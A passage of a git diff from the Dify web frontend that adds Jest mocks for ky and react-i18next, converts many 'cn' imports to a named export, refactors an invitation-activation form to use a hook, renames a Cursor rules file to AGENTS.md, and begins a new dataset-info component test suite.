"sha256:940d56ee0410fa17ee1f12b817b37a4d4e4dc4d27340863cc67236c74f582e77", size = 163065, upload-time = "2025-10-08T22:01:37.27Z" }, - { url = "https://files.pythonhosted.org/packages/39/67/f85d9bd23182f45eca8939cd2bc7050e1f90c41f4a2ecbbd5963a1d1c486/tomli-2.3.0-cp314-cp314t-macosx_11_0_arm64.whl", hash = "sha256:f85209946d1fe94416debbb88d00eb92ce9cd5266775424ff81bc959e001acaf", size = 159088, upload-time = "2025-10-08T22:01:38.235Z" }, - { url = "https://files.pythonhosted.org/packages/26/5a/4b546a0405b9cc0659b399f12b6adb750757baf04250b148d3c5059fc4eb/tomli-2.3.0-cp314-cp314t-manylinux2014_aarch64.manylinux_2_17_aarch64.manylinux_2_28_aarch64.whl", hash = "sha256:a56212bdcce682e56b0aaf79e869ba5d15a6163f88d5451cbde388d48b13f530", size = 268193, upload-time = "2025-10-08T22:01:39.712Z" }, - { url = "https://files.pythonhosted.org/packages/42/4f/2c12a72ae22cf7b59a7fe75b3465b7aba40ea9145d026ba41cb382075b0e/tomli-2.3.0-cp314-cp314t-manylinux2014_x86_64.manylinux_2_17_x86_64.manylinux_2_28_x86_64.whl", hash = "sha256:c5f3ffd1e098dfc032d4d3af5c0ac64f6d286d98bc148698356847b80fa4de1b", size = 275488, upload-time = "2025-10-08T22:01:40.773Z" }, - { url = "https://files.pythonhosted.org/packages/92/04/a038d65dbe160c3aa5a624e93ad98111090f6804027d474ba9c37c8ae186/tomli-2.3.0-cp314-cp314t-musllinux_1_2_aarch64.whl", hash = "sha256:5e01decd096b1530d97d5d85cb4dff4af2d8347bd35686654a004f8dea20fc67", size = 272669, upload-time = "2025-10-08T22:01:41.824Z" }, - { url = "https://files.pythonhosted.org/packages/be/2f/8b7c60a9d1612a7cbc39ffcca4f21a73bf368a80fc25bccf8253e2563267/tomli-2.3.0-cp314-cp314t-musllinux_1_2_x86_64.whl", hash = "sha256:8a35dd0e643bb2610f156cca8db95d213a90015c11fee76c946aa62b7ae7e02f", size = 279709, upload-time = "2025-10-08T22:01:43.177Z" }, - { url = "https://files.pythonhosted.org/packages/7e/46/cc36c679f09f27ded940281c38607716c86cf8ba4a518d524e349c8b4874/tomli-2.3.0-cp314-cp314t-win32.whl", hash = "sha256:a1f7f282fe248311650081faafa5f4732bdbfef5d45fe3f2e702fbc6f2d496e0", size = 107563, upload-time = "2025-10-08T22:01:44.233Z" }, - { url = 
"https://files.pythonhosted.org/packages/84/ff/426ca8683cf7b753614480484f6437f568fd2fda2edbdf57a2d3d8b27a0b/tomli-2.3.0-cp314-cp314t-win_amd64.whl", hash = "sha256:70a251f8d4ba2d9ac2542eecf008b3c8a9fc5c3f9f02c56a9d7952612be2fdba", size = 119756, upload-time = "2025-10-08T22:01:45.234Z" }, - { url = "https://files.pythonhosted.org/packages/77/b8/0135fadc89e73be292b473cb820b4f5a08197779206b33191e801feeae40/tomli-2.3.0-py3-none-any.whl", hash = "sha256:e95b1af3c5b07d9e643909b5abbec77cd9f1217e6d0bca72b0234736b9fb1f1b", size = 14408, upload-time = "2025-10-08T22:01:46.04Z" }, -] - -[[package]] -name = "typing-extensions" -version = "4.15.0" -source = { registry = "https://pypi.org/simple" } -sdist = { url = "https://files.pythonhosted.org/packages/72/94/1a15dd82efb362ac84269196e94cf00f187f7ed21c242792a923cdb1c61f/typing_extensions-4.15.0.tar.gz", hash = "sha256:0cea48d173cc12fa28ecabc3b837ea3cf6f38c6d1136f85cbaaf598984861466", size = 109391, upload-time = "2025-08-25T13:49:26.313Z" } -wheels = [ - { url = "https://files.pythonhosted.org/packages/18/67/36e9267722cc04a6b9f15c7f3441c2363321a3ea07da7ae0c0707beb2a9c/typing_extensions-4.15.0-py3-none-any.whl", hash = "sha256:f0fa19c6845758ab08074a0cfa8b7aecb71c999ca73d62883bc25cc018c4e548", size = 44614, upload-time = "2025-08-25T13:49:24.86Z" }, -] diff --git a/web/.env.example b/web/.env.example index eff6f77fd9..b488c31057 100644 --- a/web/.env.example +++ b/web/.env.example @@ -70,3 +70,6 @@ NEXT_PUBLIC_ENABLE_SINGLE_DOLLAR_LATEX=false # The maximum number of tree node depth for workflow NEXT_PUBLIC_MAX_TREE_DEPTH=50 + +# The API key of amplitude +NEXT_PUBLIC_AMPLITUDE_API_KEY= diff --git a/.cursorrules b/web/AGENTS.md similarity index 61% rename from .cursorrules rename to web/AGENTS.md index cdfb8b17a3..7362cd51db 100644 --- a/.cursorrules +++ b/web/AGENTS.md @@ -1,6 +1,5 @@ -# Cursor Rules for Dify Project - ## Automated Test Generation - Use `web/testing/testing.md` as the canonical instruction set for generating frontend automated tests. - When proposing or saving tests, re-read that document and follow every requirement. +- All frontend tests MUST also comply with the `frontend-testing` skill. Treat the skill as a mandatory constraint, not optional guidance. diff --git a/web/CLAUDE.md b/web/CLAUDE.md new file mode 120000 index 0000000000..47dc3e3d86 --- /dev/null +++ b/web/CLAUDE.md @@ -0,0 +1 @@ +AGENTS.md \ No newline at end of file diff --git a/web/__mocks__/ky.ts b/web/__mocks__/ky.ts new file mode 100644 index 0000000000..6c7691f2cf --- /dev/null +++ b/web/__mocks__/ky.ts @@ -0,0 +1,71 @@ +/** + * Mock for ky HTTP client + * This mock is used to avoid ESM issues in Jest tests + */ + +type KyResponse = { + ok: boolean + status: number + statusText: string + headers: Headers + json: jest.Mock + text: jest.Mock + blob: jest.Mock + arrayBuffer: jest.Mock + clone: jest.Mock +} + +type KyInstance = jest.Mock & { + get: jest.Mock + post: jest.Mock + put: jest.Mock + patch: jest.Mock + delete: jest.Mock + head: jest.Mock + create: jest.Mock + extend: jest.Mock + stop: symbol +} + +const createResponse = (data: unknown = {}, status = 200): KyResponse => { + const response: KyResponse = { + ok: status >= 200 && status < 300, + status, + statusText: status === 200 ? 
'OK' : 'Error', + headers: new Headers(), + json: jest.fn().mockResolvedValue(data), + text: jest.fn().mockResolvedValue(JSON.stringify(data)), + blob: jest.fn().mockResolvedValue(new Blob()), + arrayBuffer: jest.fn().mockResolvedValue(new ArrayBuffer(0)), + clone: jest.fn(), + } + // Ensure clone returns a new response-like object, not the same instance + response.clone.mockImplementation(() => createResponse(data, status)) + return response +} + +const createKyInstance = (): KyInstance => { + const instance = jest.fn().mockImplementation(() => Promise.resolve(createResponse())) as KyInstance + + // HTTP methods + instance.get = jest.fn().mockImplementation(() => Promise.resolve(createResponse())) + instance.post = jest.fn().mockImplementation(() => Promise.resolve(createResponse())) + instance.put = jest.fn().mockImplementation(() => Promise.resolve(createResponse())) + instance.patch = jest.fn().mockImplementation(() => Promise.resolve(createResponse())) + instance.delete = jest.fn().mockImplementation(() => Promise.resolve(createResponse())) + instance.head = jest.fn().mockImplementation(() => Promise.resolve(createResponse())) + + // Create new instance with custom options + instance.create = jest.fn().mockImplementation(() => createKyInstance()) + instance.extend = jest.fn().mockImplementation(() => createKyInstance()) + + // Stop method for AbortController + instance.stop = Symbol('stop') + + return instance +} + +const ky = createKyInstance() + +export default ky +export { ky } diff --git a/web/__mocks__/react-i18next.ts b/web/__mocks__/react-i18next.ts new file mode 100644 index 0000000000..1e3f58927e --- /dev/null +++ b/web/__mocks__/react-i18next.ts @@ -0,0 +1,40 @@ +/** + * Shared mock for react-i18next + * + * Jest automatically uses this mock when react-i18next is imported in tests. + * The default behavior returns the translation key as-is, which is suitable + * for most test scenarios. 
+ * + * For tests that need custom translations, you can override with jest.mock(): + * + * @example + * jest.mock('react-i18next', () => ({ + * useTranslation: () => ({ + * t: (key: string) => { + * if (key === 'some.key') return 'Custom translation' + * return key + * }, + * }), + * })) + */ + +export const useTranslation = () => ({ + t: (key: string, options?: Record) => { + if (options?.returnObjects) + return [`${key}-feature-1`, `${key}-feature-2`] + if (options) + return `${key}:${JSON.stringify(options)}` + return key + }, + i18n: { + language: 'en', + changeLanguage: jest.fn(), + }, +}) + +export const Trans = ({ children }: { children?: React.ReactNode }) => children + +export const initReactI18next = { + type: '3rdParty', + init: jest.fn(), +} diff --git a/web/__tests__/embedded-user-id-auth.test.tsx b/web/__tests__/embedded-user-id-auth.test.tsx index 5c3c3c943f..9d6734b120 100644 --- a/web/__tests__/embedded-user-id-auth.test.tsx +++ b/web/__tests__/embedded-user-id-auth.test.tsx @@ -4,12 +4,6 @@ import { fireEvent, render, screen, waitFor } from '@testing-library/react' import MailAndPasswordAuth from '@/app/(shareLayout)/webapp-signin/components/mail-and-password-auth' import CheckCode from '@/app/(shareLayout)/webapp-signin/check-code/page' -jest.mock('react-i18next', () => ({ - useTranslation: () => ({ - t: (key: string) => key, - }), -})) - const replaceMock = jest.fn() const backMock = jest.fn() diff --git a/web/__tests__/goto-anything/command-selector.test.tsx b/web/__tests__/goto-anything/command-selector.test.tsx index 6d4e045d49..e502c533bb 100644 --- a/web/__tests__/goto-anything/command-selector.test.tsx +++ b/web/__tests__/goto-anything/command-selector.test.tsx @@ -4,12 +4,6 @@ import '@testing-library/jest-dom' import CommandSelector from '../../app/components/goto-anything/command-selector' import type { ActionItem } from '../../app/components/goto-anything/actions/types' -jest.mock('react-i18next', () => ({ - useTranslation: () => ({ - t: (key: string) => key, - }), -})) - jest.mock('cmdk', () => ({ Command: { Group: ({ children, className }: any) =>
<div className={className}>{children}</div>
, diff --git a/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/layout-main.tsx b/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/layout-main.tsx index 1f836de6e6..d5e3c61932 100644 --- a/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/layout-main.tsx +++ b/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/layout-main.tsx @@ -16,7 +16,7 @@ import { import { useTranslation } from 'react-i18next' import { useShallow } from 'zustand/react/shallow' import s from './style.module.css' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' import { useStore } from '@/app/components/app/store' import AppSideBar from '@/app/components/app-sidebar' import type { NavIcon } from '@/app/components/app-sidebar/navLink' diff --git a/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/overview/time-range-picker/date-picker.tsx b/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/overview/time-range-picker/date-picker.tsx index 2bfdece433..dda5dff2b9 100644 --- a/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/overview/time-range-picker/date-picker.tsx +++ b/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/overview/time-range-picker/date-picker.tsx @@ -3,7 +3,7 @@ import { RiCalendarLine } from '@remixicon/react' import type { Dayjs } from 'dayjs' import type { FC } from 'react' import React, { useCallback } from 'react' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' import { formatToLocalTime } from '@/utils/format' import { useI18N } from '@/context/i18n' import Picker from '@/app/components/base/date-and-time-picker/date-picker' diff --git a/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/overview/time-range-picker/range-selector.tsx b/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/overview/time-range-picker/range-selector.tsx index f99ea52492..0a80bf670d 100644 --- a/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/overview/time-range-picker/range-selector.tsx +++ b/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/overview/time-range-picker/range-selector.tsx @@ -6,7 +6,7 @@ import { SimpleSelect } from '@/app/components/base/select' import type { Item } from '@/app/components/base/select' import dayjs from 'dayjs' import { RiArrowDownSLine, RiCheckLine } from '@remixicon/react' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' import { useTranslation } from 'react-i18next' const today = dayjs() diff --git a/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/overview/tracing/__tests__/svg-attribute-error-reproduction.spec.tsx b/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/overview/tracing/__tests__/svg-attribute-error-reproduction.spec.tsx index b1e915b2bf..374dbff203 100644 --- a/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/overview/tracing/__tests__/svg-attribute-error-reproduction.spec.tsx +++ b/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/overview/tracing/__tests__/svg-attribute-error-reproduction.spec.tsx @@ -3,13 +3,6 @@ import { render } from '@testing-library/react' import '@testing-library/jest-dom' import { OpikIconBig } from '@/app/components/base/icons/src/public/tracing' -// Mock dependencies to isolate the SVG rendering issue -jest.mock('react-i18next', () => ({ - useTranslation: () => ({ - t: (key: string) => key, - }), -})) - describe('SVG Attribute Error Reproduction', () => { // Capture console errors const originalError = console.error diff --git 
a/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/overview/tracing/config-button.tsx b/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/overview/tracing/config-button.tsx index 246a1eb6a3..17c919bf22 100644 --- a/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/overview/tracing/config-button.tsx +++ b/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/overview/tracing/config-button.tsx @@ -4,7 +4,7 @@ import React, { useCallback, useRef, useState } from 'react' import type { PopupProps } from './config-popup' import ConfigPopup from './config-popup' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' import { PortalToFollowElem, PortalToFollowElemContent, diff --git a/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/overview/tracing/config-popup.tsx b/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/overview/tracing/config-popup.tsx index 628eb13071..767ccb8c59 100644 --- a/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/overview/tracing/config-popup.tsx +++ b/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/overview/tracing/config-popup.tsx @@ -12,7 +12,7 @@ import Indicator from '@/app/components/header/indicator' import Switch from '@/app/components/base/switch' import Tooltip from '@/app/components/base/tooltip' import Divider from '@/app/components/base/divider' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' const I18N_PREFIX = 'app.tracing' diff --git a/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/overview/tracing/field.tsx b/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/overview/tracing/field.tsx index eecd356e08..e170159e35 100644 --- a/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/overview/tracing/field.tsx +++ b/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/overview/tracing/field.tsx @@ -1,7 +1,7 @@ 'use client' import type { FC } from 'react' import React from 'react' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' import Input from '@/app/components/base/input' type Props = { diff --git a/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/overview/tracing/panel.tsx b/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/overview/tracing/panel.tsx index 2c17931b83..319ff3f423 100644 --- a/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/overview/tracing/panel.tsx +++ b/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/overview/tracing/panel.tsx @@ -12,7 +12,7 @@ import type { AliyunConfig, ArizeConfig, DatabricksConfig, LangFuseConfig, LangS import { TracingProvider } from './type' import TracingIcon from './tracing-icon' import ConfigButton from './config-button' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' import { AliyunIcon, ArizeIcon, DatabricksIcon, LangfuseIcon, LangsmithIcon, MlflowIcon, OpikIcon, PhoenixIcon, TencentIcon, WeaveIcon } from '@/app/components/base/icons/src/public/tracing' import Indicator from '@/app/components/header/indicator' import { fetchTracingConfig as doFetchTracingConfig, fetchTracingStatus, updateTracingStatus } from '@/service/apps' diff --git a/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/overview/tracing/provider-panel.tsx b/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/overview/tracing/provider-panel.tsx index ac1704d60d..0779689c76 100644 --- a/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/overview/tracing/provider-panel.tsx +++ b/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/overview/tracing/provider-panel.tsx @@ -6,7 +6,7 @@ 
import { } from '@remixicon/react' import { useTranslation } from 'react-i18next' import { TracingProvider } from './type' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' import { AliyunIconBig, ArizeIconBig, DatabricksIconBig, LangfuseIconBig, LangsmithIconBig, MlflowIconBig, OpikIconBig, PhoenixIconBig, TencentIconBig, WeaveIconBig } from '@/app/components/base/icons/src/public/tracing' import { Eye as View } from '@/app/components/base/icons/src/vender/solid/general' diff --git a/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/overview/tracing/tracing-icon.tsx b/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/overview/tracing/tracing-icon.tsx index ec9117dd38..aeca1cd3ab 100644 --- a/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/overview/tracing/tracing-icon.tsx +++ b/web/app/(commonLayout)/app/(appDetailLayout)/[appId]/overview/tracing/tracing-icon.tsx @@ -1,7 +1,7 @@ 'use client' import type { FC } from 'react' import React from 'react' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' import { TracingIcon as Icon } from '@/app/components/base/icons/src/public/tracing' type Props = { diff --git a/web/app/(commonLayout)/datasets/(datasetDetailLayout)/[datasetId]/layout-main.tsx b/web/app/(commonLayout)/datasets/(datasetDetailLayout)/[datasetId]/layout-main.tsx index 3effb79f20..3581587b54 100644 --- a/web/app/(commonLayout)/datasets/(datasetDetailLayout)/[datasetId]/layout-main.tsx +++ b/web/app/(commonLayout)/datasets/(datasetDetailLayout)/[datasetId]/layout-main.tsx @@ -23,7 +23,7 @@ import { useDatasetDetail, useDatasetRelatedApps } from '@/service/knowledge/use import useDocumentTitle from '@/hooks/use-document-title' import ExtraInfo from '@/app/components/datasets/extra-info' import { useEventEmitterContextContext } from '@/context/event-emitter' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' export type IAppDetailLayoutProps = { children: React.ReactNode diff --git a/web/app/(shareLayout)/webapp-reset-password/layout.tsx b/web/app/(shareLayout)/webapp-reset-password/layout.tsx index e0ac6b9ad6..13073b0e6a 100644 --- a/web/app/(shareLayout)/webapp-reset-password/layout.tsx +++ b/web/app/(shareLayout)/webapp-reset-password/layout.tsx @@ -1,7 +1,7 @@ 'use client' import Header from '@/app/signin/_header' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' import { useGlobalPublicStore } from '@/context/global-public-context' export default function SignInLayout({ children }: any) { diff --git a/web/app/(shareLayout)/webapp-reset-password/set-password/page.tsx b/web/app/(shareLayout)/webapp-reset-password/set-password/page.tsx index 5e3f6fff1d..843f10e039 100644 --- a/web/app/(shareLayout)/webapp-reset-password/set-password/page.tsx +++ b/web/app/(shareLayout)/webapp-reset-password/set-password/page.tsx @@ -2,7 +2,7 @@ import { useCallback, useState } from 'react' import { useTranslation } from 'react-i18next' import { useRouter, useSearchParams } from 'next/navigation' -import cn from 'classnames' +import { cn } from '@/utils/classnames' import { RiCheckboxCircleFill } from '@remixicon/react' import { useCountDown } from 'ahooks' import Button from '@/app/components/base/button' diff --git a/web/app/(shareLayout)/webapp-signin/layout.tsx b/web/app/(shareLayout)/webapp-signin/layout.tsx index 7649982072..c75f925d40 100644 --- a/web/app/(shareLayout)/webapp-signin/layout.tsx +++ b/web/app/(shareLayout)/webapp-signin/layout.tsx @@ -1,6 +1,6 @@ 'use 
client' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' import { useGlobalPublicStore } from '@/context/global-public-context' import useDocumentTitle from '@/hooks/use-document-title' import type { PropsWithChildren } from 'react' diff --git a/web/app/(shareLayout)/webapp-signin/normalForm.tsx b/web/app/(shareLayout)/webapp-signin/normalForm.tsx index 219722eef3..a14bfcd737 100644 --- a/web/app/(shareLayout)/webapp-signin/normalForm.tsx +++ b/web/app/(shareLayout)/webapp-signin/normalForm.tsx @@ -7,7 +7,7 @@ import Loading from '@/app/components/base/loading' import MailAndCodeAuth from './components/mail-and-code-auth' import MailAndPasswordAuth from './components/mail-and-password-auth' import SSOAuth from './components/sso-auth' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' import { LicenseStatus } from '@/types/feature' import { IS_CE_EDITION } from '@/config' import { useGlobalPublicStore } from '@/context/global-public-context' diff --git a/web/app/account/oauth/authorize/layout.tsx b/web/app/account/oauth/authorize/layout.tsx index 2ab676d6b6..b70ab210d0 100644 --- a/web/app/account/oauth/authorize/layout.tsx +++ b/web/app/account/oauth/authorize/layout.tsx @@ -1,7 +1,7 @@ 'use client' import Header from '@/app/signin/_header' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' import { useGlobalPublicStore } from '@/context/global-public-context' import useDocumentTitle from '@/hooks/use-document-title' import { AppContextProvider } from '@/context/app-context' diff --git a/web/app/activate/activateForm.tsx b/web/app/activate/activateForm.tsx index d9d07cbfa1..11fc4866f3 100644 --- a/web/app/activate/activateForm.tsx +++ b/web/app/activate/activateForm.tsx @@ -1,13 +1,13 @@ 'use client' +import { useEffect } from 'react' import { useTranslation } from 'react-i18next' -import useSWR from 'swr' import { useRouter, useSearchParams } from 'next/navigation' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' import Button from '@/app/components/base/button' -import { invitationCheck } from '@/service/common' import Loading from '@/app/components/base/loading' import useDocumentTitle from '@/hooks/use-document-title' +import { useInvitationCheck } from '@/service/use-common' const ActivateForm = () => { useDocumentTitle('') @@ -26,19 +26,21 @@ const ActivateForm = () => { token, }, } - const { data: checkRes } = useSWR(checkParams, invitationCheck, { - revalidateOnFocus: false, - onSuccess(data) { - if (data.is_valid) { - const params = new URLSearchParams(searchParams) - const { email, workspace_id } = data.data - params.set('email', encodeURIComponent(email)) - params.set('workspace_id', encodeURIComponent(workspace_id)) - params.set('invite_token', encodeURIComponent(token as string)) - router.replace(`/signin?${params.toString()}`) - } - }, - }) + const { data: checkRes } = useInvitationCheck({ + ...checkParams.params, + token: token || undefined, + }, true) + + useEffect(() => { + if (checkRes?.is_valid) { + const params = new URLSearchParams(searchParams) + const { email, workspace_id } = checkRes.data + params.set('email', encodeURIComponent(email)) + params.set('workspace_id', encodeURIComponent(workspace_id)) + params.set('invite_token', encodeURIComponent(token as string)) + router.replace(`/signin?${params.toString()}`) + } + }, [checkRes, router, searchParams, token]) return (
{ diff --git a/web/app/components/app-sidebar/app-info.tsx b/web/app/components/app-sidebar/app-info.tsx index f143c2fcef..1b4377c10a 100644 --- a/web/app/components/app-sidebar/app-info.tsx +++ b/web/app/components/app-sidebar/app-info.tsx @@ -29,7 +29,7 @@ import CardView from '@/app/(commonLayout)/app/(appDetailLayout)/[appId]/overvie import type { Operation } from './app-operations' import AppOperations from './app-operations' import dynamic from 'next/dynamic' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' import { AppModeEnum } from '@/types/app' const SwitchAppModal = dynamic(() => import('@/app/components/app/switch-app-modal'), { diff --git a/web/app/components/app-sidebar/app-sidebar-dropdown.tsx b/web/app/components/app-sidebar/app-sidebar-dropdown.tsx index 3c5d38dd82..04634906af 100644 --- a/web/app/components/app-sidebar/app-sidebar-dropdown.tsx +++ b/web/app/components/app-sidebar/app-sidebar-dropdown.tsx @@ -16,7 +16,7 @@ import AppInfo from './app-info' import NavLink from './navLink' import { useStore as useAppStore } from '@/app/components/app/store' import type { NavIcon } from './navLink' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' import { AppModeEnum } from '@/types/app' type Props = { diff --git a/web/app/components/app-sidebar/dataset-info/dropdown.tsx b/web/app/components/app-sidebar/dataset-info/dropdown.tsx index ff110f70bd..dc46af2d02 100644 --- a/web/app/components/app-sidebar/dataset-info/dropdown.tsx +++ b/web/app/components/app-sidebar/dataset-info/dropdown.tsx @@ -2,7 +2,7 @@ import React, { useCallback, useState } from 'react' import { PortalToFollowElem, PortalToFollowElemContent, PortalToFollowElemTrigger } from '../../base/portal-to-follow-elem' import ActionButton from '../../base/action-button' import { RiMoreFill } from '@remixicon/react' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' import Menu from './menu' import { useSelector as useAppContextWithSelector } from '@/context/app-context' import { useDatasetDetailContextWithSelector } from '@/context/dataset-detail' diff --git a/web/app/components/app-sidebar/dataset-info/index.spec.tsx b/web/app/components/app-sidebar/dataset-info/index.spec.tsx new file mode 100644 index 0000000000..3674be6658 --- /dev/null +++ b/web/app/components/app-sidebar/dataset-info/index.spec.tsx @@ -0,0 +1,379 @@ +import React from 'react' +import { render, screen, waitFor } from '@testing-library/react' +import userEvent from '@testing-library/user-event' +import DatasetInfo from './index' +import Dropdown from './dropdown' +import Menu from './menu' +import MenuItem from './menu-item' +import type { DataSet } from '@/models/datasets' +import { + ChunkingMode, + DataSourceType, + DatasetPermission, +} from '@/models/datasets' +import { RETRIEVE_METHOD } from '@/types/app' +import { RiEditLine } from '@remixicon/react' + +let mockDataset: DataSet +let mockIsDatasetOperator = false +const mockReplace = jest.fn() +const mockInvalidDatasetList = jest.fn() +const mockInvalidDatasetDetail = jest.fn() +const mockExportPipeline = jest.fn() +const mockCheckIsUsedInApp = jest.fn() +const mockDeleteDataset = jest.fn() + +const createDataset = (overrides: Partial = {}): DataSet => ({ + id: 'dataset-1', + name: 'Dataset Name', + indexing_status: 'completed', + icon_info: { + icon: '📙', + icon_background: '#FFF4ED', + icon_type: 'emoji', + icon_url: '', + }, + description: 'Dataset description', + permission: DatasetPermission.onlyMe, + 
data_source_type: DataSourceType.FILE, + indexing_technique: 'high_quality' as DataSet['indexing_technique'], + created_by: 'user-1', + updated_by: 'user-1', + updated_at: 1690000000, + app_count: 0, + doc_form: ChunkingMode.text, + document_count: 1, + total_document_count: 1, + word_count: 1000, + provider: 'internal', + embedding_model: 'text-embedding-3', + embedding_model_provider: 'openai', + embedding_available: true, + retrieval_model_dict: { + search_method: RETRIEVE_METHOD.semantic, + reranking_enable: false, + reranking_model: { + reranking_provider_name: '', + reranking_model_name: '', + }, + top_k: 5, + score_threshold_enabled: false, + score_threshold: 0, + }, + retrieval_model: { + search_method: RETRIEVE_METHOD.semantic, + reranking_enable: false, + reranking_model: { + reranking_provider_name: '', + reranking_model_name: '', + }, + top_k: 5, + score_threshold_enabled: false, + score_threshold: 0, + }, + tags: [], + external_knowledge_info: { + external_knowledge_id: '', + external_knowledge_api_id: '', + external_knowledge_api_name: '', + external_knowledge_api_endpoint: '', + }, + external_retrieval_model: { + top_k: 0, + score_threshold: 0, + score_threshold_enabled: false, + }, + built_in_field_enabled: false, + runtime_mode: 'rag_pipeline', + enable_api: false, + is_multimodal: false, + ...overrides, +}) + +jest.mock('next/navigation', () => ({ + useRouter: () => ({ + replace: mockReplace, + }), +})) + +jest.mock('@/context/dataset-detail', () => ({ + useDatasetDetailContextWithSelector: (selector: (state: { dataset?: DataSet }) => unknown) => selector({ dataset: mockDataset }), +})) + +jest.mock('@/context/app-context', () => ({ + useSelector: (selector: (state: { isCurrentWorkspaceDatasetOperator: boolean }) => unknown) => + selector({ isCurrentWorkspaceDatasetOperator: mockIsDatasetOperator }), +})) + +jest.mock('@/service/knowledge/use-dataset', () => ({ + datasetDetailQueryKeyPrefix: ['dataset', 'detail'], + useInvalidDatasetList: () => mockInvalidDatasetList, +})) + +jest.mock('@/service/use-base', () => ({ + useInvalid: () => mockInvalidDatasetDetail, +})) + +jest.mock('@/service/use-pipeline', () => ({ + useExportPipelineDSL: () => ({ + mutateAsync: mockExportPipeline, + }), +})) + +jest.mock('@/service/datasets', () => ({ + checkIsUsedInApp: (...args: unknown[]) => mockCheckIsUsedInApp(...args), + deleteDataset: (...args: unknown[]) => mockDeleteDataset(...args), +})) + +jest.mock('@/hooks/use-knowledge', () => ({ + useKnowledge: () => ({ + formatIndexingTechniqueAndMethod: () => 'indexing-technique', + }), +})) + +jest.mock('@/app/components/datasets/rename-modal', () => ({ + __esModule: true, + default: ({ + show, + onClose, + onSuccess, + }: { + show: boolean + onClose: () => void + onSuccess?: () => void + }) => { + if (!show) + return null + return ( +
+ + +
+ ) + }, +})) + +const openMenu = async (user: ReturnType) => { + const trigger = screen.getByRole('button') + await user.click(trigger) +} + +describe('DatasetInfo', () => { + beforeEach(() => { + jest.clearAllMocks() + mockDataset = createDataset() + mockIsDatasetOperator = false + }) + + // Rendering of dataset summary details based on expand and dataset state. + describe('Rendering', () => { + it('should show dataset details when expanded', () => { + // Arrange + mockDataset = createDataset({ is_published: true }) + render() + + // Assert + expect(screen.getByText('Dataset Name')).toBeInTheDocument() + expect(screen.getByText('Dataset description')).toBeInTheDocument() + expect(screen.getByText('dataset.chunkingMode.general')).toBeInTheDocument() + expect(screen.getByText('indexing-technique')).toBeInTheDocument() + }) + + it('should show external tag when provider is external', () => { + // Arrange + mockDataset = createDataset({ provider: 'external', is_published: false }) + render() + + // Assert + expect(screen.getByText('dataset.externalTag')).toBeInTheDocument() + expect(screen.queryByText('dataset.chunkingMode.general')).not.toBeInTheDocument() + }) + + it('should hide detailed fields when collapsed', () => { + // Arrange + render() + + // Assert + expect(screen.queryByText('Dataset Name')).not.toBeInTheDocument() + expect(screen.queryByText('Dataset description')).not.toBeInTheDocument() + }) + }) +}) + +describe('MenuItem', () => { + beforeEach(() => { + jest.clearAllMocks() + }) + + // Event handling for menu item interactions. + describe('Interactions', () => { + it('should call handler when clicked', async () => { + const user = userEvent.setup() + const handleClick = jest.fn() + // Arrange + render() + + // Act + await user.click(screen.getByText('Edit')) + + // Assert + expect(handleClick).toHaveBeenCalledTimes(1) + }) + }) +}) + +describe('Menu', () => { + beforeEach(() => { + jest.clearAllMocks() + mockDataset = createDataset() + }) + + // Rendering of menu options based on runtime mode and delete visibility. 
